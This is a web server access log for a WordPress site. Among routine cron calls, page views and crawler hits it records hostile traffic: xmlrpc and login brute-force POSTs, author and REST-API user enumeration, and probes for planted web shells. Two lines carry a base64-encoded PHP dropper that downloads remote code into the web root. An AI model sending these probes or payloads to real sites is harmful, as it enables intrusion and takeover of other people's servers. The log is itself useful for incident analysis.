89.28.217.3 - - [01/Apr/2025:08:06:57 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14"
156.248.102.175 - - [01/Apr/2025:08:07:48 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
198.54.114.83 - - [01/Apr/2025:08:20:35 -0400] "POST /wp-cron.php?doing_wp_cron=1743510035.4637489318847656250000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
162.240.170.99 - - [01/Apr/2025:08:20:31 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0"
199.188.207.168 - - [01/Apr/2025:08:34:08 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1"
198.54.114.83 - - [01/Apr/2025:08:34:14 -0400] "POST /wp-cron.php?doing_wp_cron=1743510852.4208691120147705078125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
188.130.137.241 - - [01/Apr/2025:08:35:30 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
188.130.137.241 - - [01/Apr/2025:08:36:32 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
170.106.15.3 - - [01/Apr/2025:08:37:12 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.218.124.157 - - [01/Apr/2025:08:47:47 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
43.153.10.83 - - [01/Apr/2025:08:55:20 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
109.123.236.117 - - [01/Apr/2025:09:01:27 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0"
198.54.114.83 - - [01/Apr/2025:09:01:31 -0400] "POST /wp-cron.php?doing_wp_cron=1743512488.0667281150817871093750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
198.54.114.83 - - [01/Apr/2025:09:14:30 -0400] "POST /wp-cron.php?doing_wp_cron=1743513270.0096879005432128906250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
64.227.145.225 - - [01/Apr/2025:09:14:26 -0400] "GET /file-manager/fm-button HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:09:15:10 -0400] "POST /wp-cron.php?doing_wp_cron=1743513310.0461089611053466796875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
115.245.68.141 - - [01/Apr/2025:09:15:09 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14"
43.156.228.27 - - [01/Apr/2025:09:22:40 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [01/Apr/2025:09:28:46 -0400] "POST /wp-cron.php?doing_wp_cron=1743514125.6383249759674072265625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
162.240.170.99 - - [01/Apr/2025:09:28:41 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
2607:f298:5:114b::263:a4ba - - [01/Apr/2025:09:55:51 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0"
163.5.241.6 - - [01/Apr/2025:10:04:10 -0400] "GET / HTTP/1.1" 200 24560 "-" "Python/3.11 aiohttp/3.11.11"
208.85.92.157 - - [01/Apr/2025:10:06:04 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:10:06:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743516365.3462688922882080078125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
208.85.92.157 - - [01/Apr/2025:10:06:05 -0400] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:10:06:06 -0400] "GET /?author=2 HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:10:06:07 -0400] "GET /?author=3 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:10:06:08 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 1381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:10:06:10 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:10:06:11 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:10:06:13 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:10:06:13 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:10:06:15 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.85.92.157 - - [01/Apr/2025:10:06:16 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:10:09:43 -0400] "POST /wp-cron.php?doing_wp_cron=1743516582.1661620140075683593750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
199.188.201.3 - - [01/Apr/2025:10:09:36 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36"
85.208.98.23 - - [01/Apr/2025:10:22:06 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:10:26:51 -0400] "POST /wp-cron.php?doing_wp_cron=1743517610.8565781116485595703125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
149.255.58.142 - - [01/Apr/2025:10:26:46 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1"
198.54.114.83 - - [01/Apr/2025:10:29:46 -0400] "POST /wp-cron.php?doing_wp_cron=1743517786.1109418869018554687500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
91.148.239.130 - - [01/Apr/2025:10:29:44 -0400] "GET /wp-options.php?ekle=111 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:49 -0400] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1" 200 5342 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:49 -0400] "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.2 HTTP/1.1" 200 19532 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:49 -0400] "GET /wp-content/themes/chromenews/assets/sidr/css/jquery.sidr.dark.css?ver=4.9.3 HTTP/1.1" 200 445 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:49 -0400] "GET /wp-content/themes/chromenews/assets/icons/style.css?ver=6.7.2 HTTP/1.1" 200 1271 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:49 -0400] "GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1" 200 35438 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:49 -0400] "GET /wp-content/themes/chromenews/style.min.css?ver=4.9.3 HTTP/1.1" 200 67447 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:50 -0400] "GET /wp-content/themes/chromenews/assets/jquery.cookie.js?ver=6.7.2 HTTP/1.1" 200 1470 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:50 -0400] "GET /wp-content/themes/chromenews/assets/toggle-script.js?ver=4.9.3 HTTP/1.1" 200 499 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:50 -0400] "GET /wp-content/themes/chromenews/js/navigation.js?ver=20151215 HTTP/1.1" 200 1179 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:50 -0400] "GET /wp-content/themes/chromenews/js/skip-link-focus-fix.js?ver=4.9.3 HTTP/1.1" 200 426 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:51 -0400] "GET /wp-content/themes/chromenews/assets/script.js?ver=4.9.3 HTTP/1.1" 200 5660 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:29:51 -0400] "GET /wp-content/themes/chromenews/assets/sidr/js/jquery.sidr.min.js?ver=4.9.3 HTTP/1.1" 200 2846 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
182.43.70.143 - - [01/Apr/2025:10:35:51 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.54.114.83 - - [01/Apr/2025:10:42:54 -0400] "POST /wp-cron.php?doing_wp_cron=1743518573.4529299736022949218750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
178.32.112.62 - - [01/Apr/2025:10:42:48 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:41 -0400] "GET /wp-options.php?ekle=111 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:43 -0400] "GET /wp-content/themes/chromenews/assets/jquery.cookie.js?ver=6.7.2 HTTP/1.1" 200 1470 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:43 -0400] "GET /wp-content/themes/chromenews/assets/toggle-script.js?ver=4.9.3 HTTP/1.1" 200 499 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:43 -0400] "GET /wp-content/themes/chromenews/js/skip-link-focus-fix.js?ver=4.9.3 HTTP/1.1" 200 426 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:43 -0400] "GET /wp-content/themes/chromenews/assets/sidr/js/jquery.sidr.min.js?ver=4.9.3 HTTP/1.1" 200 2846 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:43 -0400] "GET /wp-content/themes/chromenews/js/navigation.js?ver=20151215 HTTP/1.1" 200 1179 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:43 -0400] "GET /wp-content/themes/chromenews/assets/script.js?ver=4.9.3 HTTP/1.1" 200 5660 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:44 -0400] "GET /wp-content/themes/chromenews/assets/jquery-match-height/jquery.matchHeight.min.js?ver=4.9.3 HTTP/1.1" 200 1470 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:44 -0400] "GET /wp-content/themes/chromenews/assets/icons/fonts/aft-icons.ttf?e3nek0 HTTP/1.1" 200 19272 "http://shahmeenaindustry.com/wp-content/themes/chromenews/assets/icons/style.css?ver=6.7.2" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:45 -0400] "GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.2 HTTP/1.1" 200 5857 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:10:48:46 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "http://shahmeenaindustry.com/wp-options.php?ekle=111" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
213.199.36.148 - - [01/Apr/2025:10:58:56 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:10:59:01 -0400] "POST /wp-cron.php?doing_wp_cron=1743519540.1540551185607910156250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
103.90.149.35 - - [01/Apr/2025:11:06:54 -0400] "GET / HTTP/1.1" 200 24560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.35 - - [01/Apr/2025:11:06:56 -0400] "GET /wp-includes/ID3/license.txt HTTP/1.1" 200 501 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.35 - - [01/Apr/2025:11:06:58 -0400] "GET /feed/ HTTP/1.1" 200 217282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
103.90.149.35 - - [01/Apr/2025:11:07:00 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:11:07:06 -0400] "POST /wp-cron.php?doing_wp_cron=1743520025.1910340785980224609375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
107.172.243.11 - - [01/Apr/2025:11:15:23 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:11:15:30 -0400] "POST /wp-cron.php?doing_wp_cron=1743520528.1359601020812988281250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
205.210.31.239 - - [01/Apr/2025:11:17:19 -0400] "GET / HTTP/1.1" 200 24560 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
91.148.239.130 - - [01/Apr/2025:11:20:33 -0400] "GET /wp-includes/pomo/pomo.php?log=sanane&act=upload&file=wordpress.php&data=PD9waHAKaWYgKGlzc2V0KCRfR0VUWyd1J10pKSB7CiAgICAkdXJsID0gJF9HRVRbJ3UnXTsKICAgIGlmIChmaWx0ZXJfdmFyKCR1cmwsIEZJTFRFUl9WQUxJREFURV9VUkwpKSB7CiAgICAgICAgJGZpbGVDb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7CiAgICAgICAgaWYgKCRmaWxlQ29udGVudCAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgJGZpbGVOYW1lID0gYmFzZW5hbWUocGFyc2VfdXJsKCR1cmwsIFBIUF9VUkxfUEFUSCkpOwogICAgICAgICAgICAkZmlsZU5hbWVXaXRob3V0RXh0ID0gcGF0aGluZm8oJGZpbGVOYW1lLCBQQVRISU5GT19GSUxFTkFNRSk7CiAgICAgICAgICAgICRuZXdGaWxlTmFtZSA9ICRmaWxlTmFtZVdpdGhvdXRFeHQgLiAnLnBocCc7CiAgICAgICAgICAgICRzYXZlUGF0aCA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAnLycgLiAkbmV3RmlsZU5hbWU7CiAgICAgICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCRzYXZlUGF0aCwgJGZpbGVDb250ZW50KTsKICAgICAgICAgICAgZWNobyAiRG9zeWEga2F5ZGVkaWxkaTogIiAuICRuZXdGaWxlTmFtZTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICBlY2hvICJEb3N5YSBpw6dlcmnEn2kgYWzEsW5hbWFkxLEuIjsKICAgICAgICB9CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkdlw6dlcnNpeiBVUkwuIjsKICAgIH0KfSBlbHNlIHsKICAgIGVjaG8gIlVSTCBiZWxpcnRpbG1lZGkuIjsKfQo/Pgo= HTTP/1.1" 404 16544 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
91.148.239.130 - - [01/Apr/2025:11:20:38 -0400] "GET /favicon.ico HTTP/1.1" 404 1251 "http://shahmeenaindustry.com/wp-includes/pomo/pomo.php?log=sanane&act=upload&file=wordpress.php&data=PD9waHAKaWYgKGlzc2V0KCRfR0VUWyd1J10pKSB7CiAgICAkdXJsID0gJF9HRVRbJ3UnXTsKICAgIGlmIChmaWx0ZXJfdmFyKCR1cmwsIEZJTFRFUl9WQUxJREFURV9VUkwpKSB7CiAgICAgICAgJGZpbGVDb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7CiAgICAgICAgaWYgKCRmaWxlQ29udGVudCAhPT0gZmFsc2UpIHsKICAgICAgICAgICAgJGZpbGVOYW1lID0gYmFzZW5hbWUocGFyc2VfdXJsKCR1cmwsIFBIUF9VUkxfUEFUSCkpOwogICAgICAgICAgICAkZmlsZU5hbWVXaXRob3V0RXh0ID0gcGF0aGluZm8oJGZpbGVOYW1lLCBQQVRISU5GT19GSUxFTkFNRSk7CiAgICAgICAgICAgICRuZXdGaWxlTmFtZSA9ICRmaWxlTmFtZVdpdGhvdXRFeHQgLiAnLnBocCc7CiAgICAgICAgICAgICRzYXZlUGF0aCA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAnLycgLiAkbmV3RmlsZU5hbWU7CiAgICAgICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCRzYXZlUGF0aCwgJGZpbGVDb250ZW50KTsKICAgICAgICAgICAgZWNobyAiRG9zeWEga2F5ZGVkaWxkaTogIiAuICRuZXdGaWxlTmFtZTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICBlY2hvICJEb3N5YSBpw6dlcmnEn2kgYWzEsW5hbWFkxLEuIjsKICAgICAgICB9CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkdlw6dlcnNpeiBVUkwuIjsKICAgIH0KfSBlbHNlIHsKICAgIGVjaG8gIlVSTCBiZWxpcnRpbG1lZGkuIjsKfQo/Pgo=" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/134.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:11:24:15 -0400] "POST /wp-cron.php?doing_wp_cron=1743521054.2187380790710449218750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
194.38.23.16 - - [01/Apr/2025:11:24:10 -0400] "GET /plugins/html5-file-upload/html5fileupload.php HTTP/1.1" 404 16544 "-" "ALittle Client"
216.244.66.200 - - [01/Apr/2025:11:31:48 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
198.54.114.83 - - [01/Apr/2025:11:39:29 -0400] "POST /wp-cron.php?doing_wp_cron=1743521969.3883268833160400390625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
216.244.66.200 - - [01/Apr/2025:11:39:29 -0400] "GET /what-you-need-to-know/feed/ HTTP/1.1" 200 431 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
85.208.98.23 - - [01/Apr/2025:12:32:27 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:12:34:58 -0400] "POST /wp-cron.php?doing_wp_cron=1743525298.1169710159301757812500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
185.218.124.157 - - [01/Apr/2025:12:34:53 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
198.54.114.83 - - [01/Apr/2025:12:36:47 -0400] "POST /wp-cron.php?doing_wp_cron=1743525407.3068809509277343750000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
196.251.88.242 - - [01/Apr/2025:12:36:42 -0400] "GET /geju.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [01/Apr/2025:12:36:57 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:12:37:07 -0400] "POST /wp-cron.php?doing_wp_cron=1743525427.2265479564666748046875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
